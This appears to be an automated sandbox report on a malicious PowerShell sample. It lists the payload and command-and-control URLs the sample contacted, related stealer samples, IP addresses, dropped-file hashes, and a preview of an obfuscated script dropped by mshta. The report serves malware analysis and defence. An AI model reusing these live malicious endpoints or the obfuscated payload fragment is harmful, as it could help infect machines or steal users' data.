                                                                                https://scrutinycheck.cash/singl7.mp4https://scrutinycheck.cash/singl7.mp4https://scrutinycheck.cashmshta.exe, 00000002.00000003.1812802151.000002059AF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813690985.000002059AF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813789160.000002059AF70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1788739596.0000029766D1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1764165134.00000297587FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1788739596.0000029766E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2611936982.00000000062FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://scrutinycheck.cash/singl7.mp4beLMEMP(mshta.exe, 00000002.00000002.1825644443.000002059F075000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://hushedocenahu.click/apiB=powershell.exe, 0000000C.00000002.2804009352.00000000034AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2611936982.00000000053E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2611936982.00000000053E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://scrutinycheck.cash/singl7.mp430mshta.exe, 00000002.00000003.1812802151.000002059AF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813690985.000002059AF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813789160.000002059AF70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://go.micropowershell.exe, 00000004.00000002.1764165134.0000029757A75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://scrutinycheck.cash/singl7.mp4https://scrutinycheck.cash/singl7.mp46mshta.exe, 00000002.00000003.1812802151.000002059AF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813690985.000002059AF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813789160.000002059AF70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://contoso.com/Iconpowershell.exe, 00000006.00000002.2611936982.00000000062FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://scrutinycheck.cash/singl7.mp4C:mshta.exe, 00000002.00000003.1818296198.000001FD98C2E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1804302516.000001FD98C27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1823014158.000001FD98C33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1802308587.000001FD98C26000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822579001.000001FD98B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1818681385.000001FD98C32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crl.ver)svchost.exe, 00000003.00000002.3369206045.0000029796000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://hushedocenahu.click:443/apiApowershell.exe, 0000000C.00000002.2800133767.0000000003423000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://scrutinycheck.cash/singl7.mp4.Omshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822735275.000001FD98B8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://hushedocenahu.click/bupowershell.exe, 0000000C.00000002.2803637158.00000000034A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://scrutinycheck.cash/singl7.mp4432=C:mshta.exe, 00000002.00000002.1825644443.000002059F075000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://hushedocenahu.click:443/apiKpowershell.exe, 0000000C.00000002.2800133767.0000000003423000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2611936982.00000000053E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000003.00000003.1732763715.0000029795EB2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drfalse
                                                                                                              high
                                                                                                              https://scrutinycheck.cash/singl7.mp4;mshta.exe, 00000002.00000003.1812802151.000002059AF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813690985.000002059AF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813789160.000002059AF70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://aka.ms/pscore6lBdqpowershell.exe, 00000006.00000002.2611936982.0000000005291000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://hushedocenahu.click/apibpowershell.exe, 0000000C.00000002.2803637158.00000000034A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://scrutinycheck.cash/singl7.mp4SSC:mshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://scrutinycheck.cash/singl7.mp4...mshta.exe, 00000002.00000002.1823781557.000002059AD41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.1707001307.0000026C0A6AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1764165134.0000029756CA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://scrutinycheck.cash/singl7.mp4Hmshta.exe, 00000002.00000002.1822137418.000001FD98AF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://scrutinycheck.cash/singl7.mp4https://scrutinycheck.cash/singl7.mp4mshta.exe, 00000002.00000003.1811274652.000002059AF65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://hushedocenahu.click/opowershell.exe, 0000000C.00000002.2804009352.00000000034AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://scrutinycheck.cash/tmshta.exe, 00000002.00000002.1822900003.000001FD98C02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1818296198.000001FD98C01000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1802308587.000001FD98C01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://scrutinycheck.cash/singl7.mp4Omshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822735275.000001FD98B8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://hushedocenahu.click/pipowershell.exe, 0000000C.00000002.2803637158.00000000034A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                • No. of IPs < 25%
                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                • 75% < No. of IPs
                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                104.21.16.1
                                                                                                                                dma.sportstalk-musiclover.comUnited States
                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                104.21.112.1
                                                                                                                                hushedocenahu.clickUnited States
                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                104.21.38.253
                                                                                                                                scrutinycheck.cashUnited States
                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                IP
                                                                                                                                127.0.0.1
                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                Analysis ID:1580648
                                                                                                                                Start date and time:2024-12-25 15:08:05 +01:00
                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                Overall analysis duration:0h 9m 1s
                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                Report type:full
                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                Number of analysed new started processes analysed:13
                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                Number of existing processes analysed:0
                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                Number of injected processes analysed:0
                                                                                                                                Technologies:
                                                                                                                                • HCA enabled
                                                                                                                                • EGA enabled
                                                                                                                                • AMSI enabled
                                                                                                                                Analysis Mode:default
                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                Sample name:00000.ps1
                                                                                                                                Detection:MAL
                                                                                                                                Classification:mal100.troj.spyw.evad.winPS1@13/16@3/4
                                                                                                                                EGA Information:
                                                                                                                                • Successful, ratio: 40%
                                                                                                                                HCA Information:
                                                                                                                                • Successful, ratio: 92%
                                                                                                                                • Number of executed functions: 100
                                                                                                                                • Number of non-executed functions: 31
                                                                                                                                Cookbook Comments:
                                                                                                                                • Found application associated with file extension: .ps1
                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                • Stop behavior analysis, all processes terminated
                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.245.163.56, 13.107.246.63, 4.175.87.197
                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                • Execution Graph export aborted for target mshta.exe, PID 3844 because there are no executed function
                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 2800 because it is empty
                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 2996 because it is empty
                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                TimeTypeDescription
                                                                                                                                09:09:03API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                                                                09:09:05API Interceptor56x Sleep call for process: powershell.exe modified
                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                104.21.16.1JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                                                                                                104.21.112.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                • beammp.com/phpmyadmin/
                                                                                                                                No context
                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                CLOUDFLARENETUShttps://fsharetv.co/Get hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.131.140
                                                                                                                                123.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.90.105
                                                                                                                                https://t.co/aoHJd5qL2sGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.174.18
                                                                                                                                https://yungbucksbbq.com/portbiz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 104.17.25.14
                                                                                                                                https://email.equifaxbreachsettlement.com/c/eJwUys9qtDAQAPCnSY6STLL_DjnIp4GFr-3iLrX0EuLMiMLqWo1r-_al9x-5yDrGo2SnD8YednvYK9m5lhEPSJpaYtPgDk-NUUQKCS3r2MjegQKrAbSy1oLKWmC1UycbkU9asxZW8dfat_G7mTlit3BKdx54TBk-Bnl3XUrTIkwuwAvw27Zlw8808xR7Qh4Tz39OgJ-ZmAdhPOODWJiihuP7y__al5_1Vc5uoPhMfRyFVeuCGdMqkyv9R7hUb6HKb3m4VOUlPxfhX14VoThfb-Favhby6eA3AAD__0qSUF8Get hashmaliciousUnknownBrowse
                                                                                                                                • 1.1.1.1
                                                                                                                                http://assets.website-files.com/65efffe8d4e10d26910f0543/65f65633ab8b2f021b357c18_64146967722.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.16.123.96
                                                                                                                                https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 104.17.24.14
                                                                                                                                PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 172.64.41.3
                                                                                                                                http://6p8c.enterszcainmenthub.ruGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.68.200
                                                                                                                                CLOUDFLARENETUShttps://fsharetv.co/Get hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.131.140
                                                                                                                                123.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.90.105
                                                                                                                                https://t.co/aoHJd5qL2sGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.174.18
                                                                                                                                https://yungbucksbbq.com/portbiz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 104.17.25.14
                                                                                                                                https://email.equifaxbreachsettlement.com/c/eJwUys9qtDAQAPCnSY6STLL_DjnIp4GFr-3iLrX0EuLMiMLqWo1r-_al9x-5yDrGo2SnD8YednvYK9m5lhEPSJpaYtPgDk-NUUQKCS3r2MjegQKrAbSy1oLKWmC1UycbkU9asxZW8dfat_G7mTlit3BKdx54TBk-Bnl3XUrTIkwuwAvw27Zlw8808xR7Qh4Tz39OgJ-ZmAdhPOODWJiihuP7y__al5_1Vc5uoPhMfRyFVeuCGdMqkyv9R7hUb6HKb3m4VOUlPxfhX14VoThfb-Favhby6eA3AAD__0qSUF8Get hashmaliciousUnknownBrowse
                                                                                                                                • 1.1.1.1
                                                                                                                                http://assets.website-files.com/65efffe8d4e10d26910f0543/65f65633ab8b2f021b357c18_64146967722.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.16.123.96
                                                                                                                                https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 104.17.24.14
                                                                                                                                PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 172.64.41.3
                                                                                                                                http://6p8c.enterszcainmenthub.ruGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.68.200
                                                                                                                                CLOUDFLARENETUShttps://fsharetv.co/Get hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.131.140
                                                                                                                                123.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.90.105
                                                                                                                                https://t.co/aoHJd5qL2sGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.174.18
                                                                                                                                https://yungbucksbbq.com/portbiz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 104.17.25.14
                                                                                                                                https://email.equifaxbreachsettlement.com/c/eJwUys9qtDAQAPCnSY6STLL_DjnIp4GFr-3iLrX0EuLMiMLqWo1r-_al9x-5yDrGo2SnD8YednvYK9m5lhEPSJpaYtPgDk-NUUQKCS3r2MjegQKrAbSy1oLKWmC1UycbkU9asxZW8dfat_G7mTlit3BKdx54TBk-Bnl3XUrTIkwuwAvw27Zlw8808xR7Qh4Tz39OgJ-ZmAdhPOODWJiihuP7y__al5_1Vc5uoPhMfRyFVeuCGdMqkyv9R7hUb6HKb3m4VOUlPxfhX14VoThfb-Favhby6eA3AAD__0qSUF8Get hashmaliciousUnknownBrowse
                                                                                                                                • 1.1.1.1
                                                                                                                                http://assets.website-files.com/65efffe8d4e10d26910f0543/65f65633ab8b2f021b357c18_64146967722.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.16.123.96
                                                                                                                                https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 104.17.24.14
                                                                                                                                PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 172.64.41.3
                                                                                                                                http://6p8c.enterszcainmenthub.ruGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.68.200
                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0e123.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.16.1
                                                                                                                                PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 104.21.16.1
                                                                                                                                wUSt04rfJ0.exeGet hashmaliciousQuasarBrowse
                                                                                                                                • 104.21.16.1
                                                                                                                                #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.16.1
                                                                                                                                gYjK72gL17.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                • 104.21.16.1
                                                                                                                                Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 104.21.16.1
                                                                                                                                Gq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                • 104.21.16.1
                                                                                                                                Gq48hjKhZf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.16.1
                                                                                                                                singl6.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.16.1
                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1123.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                vce exam simulator 2.2.1 crackk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                iUKUR1nUyD.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                j6ks0Fxu6t.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                wIgjKoo9iI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                fnCae9FQhg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                37f463bf4616ecd445d4a1937da06e19123.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.38.253
                                                                                                                                Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                • 104.21.38.253
                                                                                                                                blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                • 104.21.38.253
                                                                                                                                PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 104.21.38.253
                                                                                                                                New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                • 104.21.38.253
                                                                                                                                RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                • 104.21.38.253
                                                                                                                                installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.38.253
                                                                                                                                #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.38.253
                                                                                                                                T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                                                                                                                • 104.21.38.253
                                                                                                                                No context
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8192
                                                                                                                                Entropy (8bit):0.363788168458258
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                                                                                MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                                                                                SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                                                                                SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                                                                                SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1310720
                                                                                                                                Entropy (8bit):1.310829727536813
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvry:KooCEYhgYEL0In
                                                                                                                                MD5:A6DC8E0A271FC93E3336D1713AE84C2D
                                                                                                                                SHA1:76E6F1240B6F77613F48A62D19C199BB5331852B
                                                                                                                                SHA-256:EB16964E2FE1B178A804DF3E93D0402AA0A64F1F7BBD1AC78D63318F612DF67C
                                                                                                                                SHA-512:AE7533F9953028B80089D1CBB8028D8A99343E6FBE0FDF311B7918074911F5603E08C06733EF0897EC89311CB4BCF1B74797D753371BAB5536E289C19C9E4804
                                                                                                                                Malicious:false
                                                                                                                                Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7cddf7af, page size 16384, Windows version 10.0
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1310720
                                                                                                                                Entropy (8bit):0.4222369643622818
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:/SB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:/azag03A2UrzJDO
                                                                                                                                MD5:4EA85FE374F184E5DF26E00E17A01BE0
                                                                                                                                SHA1:F94C9E4322EA8C2DD8F2A2E5A57B0DE7C7209952
                                                                                                                                SHA-256:4BC1D83FD38FA135FA5151527C8225DCEE0FDD65A587BEB2C6FA39BA07247457
                                                                                                                                SHA-512:0D2F0B0B37D7438C62F4BC014E43F00CA179E5D95EDC415642FFBDFA9B1804ACA41A0D7BCC2BDC934C48767D01C94D0FF5F798BFA33ED4352F7D86CFB74DE78B
                                                                                                                                Malicious:false
                                                                                                                                Preview:|...... .......Y.......X\...;...{......................n.%..........|;......|..h.#..........|;.n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................(.:......|;.................)).Y.....|;..........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):16384
                                                                                                                                Entropy (8bit):0.07871839023595074
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:6WllUetYeRK83pG//GmGkimg/7W//allOE/tlnl+/rTc:PlNzRn3YZbiPCepMP
                                                                                                                                MD5:3AAFECA757BEF67A8985768644BEDED5
                                                                                                                                SHA1:6B8EBD19CC25E21ED5B2B9CAFE056C52831A837D
                                                                                                                                SHA-256:128AA54B368E80F36CC150BEAA60E437B0ADB0F6329920AEF1C4AA24B218A311
                                                                                                                                SHA-512:3D29C49C1A290830E2203A28C0006F71984F52B2ABCB040AE0CCE23BAD249DD797B4580D79BD278DA7E2D6B26DC63ECEB9972C3374980085C87089AA39583732
                                                                                                                                Malicious:false
                                                                                                                                Preview:.Ox......................................;...{.......|.......|;..............|;......|;.".vc.....|..................)).Y.....|;.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):590282
                                                                                                                                Entropy (8bit):6.09828560119587
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:EEVE3odemevKW2enkfetAeuXeSDhpDcMzaIQJeekmcvexel2qf:BUMV
                                                                                                                                MD5:80823D8B0A3FED5995AC3BD70B17C86D
                                                                                                                                SHA1:3C976B8048C4CDDFC8CBABA1CC663FF609FCBC17
                                                                                                                                SHA-256:7161333AF917766E2A531C8E52559011D5DB2BCA43CC7B610CF107B96DBF5BB3
                                                                                                                                SHA-512:97E7E6FF59627E7DF6579036553B25BB77981BD3C76528F5342240289A909613C37D429F93AAA42A0A603AF4BC7229F300FF5175120211F96393B03D6FAE3E74
                                                                                                                                Malicious:false
                                                                                                                                Preview:66k75O6eF63h74z69c6fZ6eW20k55j4cd43O43d28M47b56Z59W6bP78M29B7bA76J61j72f20J61f51M77O67b72a4fR3df20R27B27p3bC66q6fz72s20l28y76m61u72O20p59K49d65J78x53K5ab20o3dT20j30B3ba59e49a65Y78T53Q5aL20u3cJ20S47x56x59c6bW78Z2ei6cX65W6ea67D74N68P3bV20q59y49C65D78R53Q5az2bc2bM29h7bA76P61Y72Q20b44Y66V6cn42r20k3dw20r53M74B72m69Y6ec67E2eR66s72f6fn6dK43J68k61Z72R43M6fu64e65K28p47l56Q59b6bH78A5bR59v49y65F78Q53W5af5dZ20y2dm20B38R33t35n29u3bL61T51B77N67E72O4fg20C3dH20I61s51N77Z67G72G4fw20Z2be20X44L66I6cT42n7dP72Q65f74j75l72m6eP20v61A51q77P67e72R4fO7dO3bD76l61k72t20q61w51X77I67F72S4fr20q3db20m55V4cc43m43r28g5bm39w34Z37e2cv39P34r36N2cr39X35J34c2co39i33L36b2cl39a34O39c2cq39s35H30Z2cR39t33w39n2cI39f33N36d2cm39l34c33R2ce39G34p33d2cy38j38f31l2cv39q33D36I2cQ39K35k35C2cX39P33p36t2co38z36N37B2cT38E38E30M2cJ39g35q34C2cF38t36x37e2ck38l38e34H2cN38V36e37b2cq38n38X30y2cu39L33G36X2cw39i34c37e2ct38o36K37u2cf39S32c30P2cz39A34C35X2cN39G34R39m2ck39h33g36S2cU39m35K30g2ch39G35S31y2cZ39T34G39X2cQ39S34l30w2ca39k33c34u2ct39O35b31p2
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9434
                                                                                                                                Entropy (8bit):4.9287357903615305
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdQgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4Zjkjh4iUxsT6Ypib47
                                                                                                                                MD5:1A90203078D9A709A26D31BAA0CDB7C4
                                                                                                                                SHA1:A84D0053A4FC5A3B17D02CB27F53C9920E9007B2
                                                                                                                                SHA-256:788B7EFEA1DC3350F5CBB62B8EA8730FB0CABED347064C6CC75A9047AB057B49
                                                                                                                                SHA-512:8110B0AB271B0890A65C52C49161FED843C13BEE64A10F64997BB80A9E5F4996B8FCE69A4DD666010A69F76930A666DA1DA07625B0FC102F0EE6BA24ECB7CE99
                                                                                                                                Malicious:false
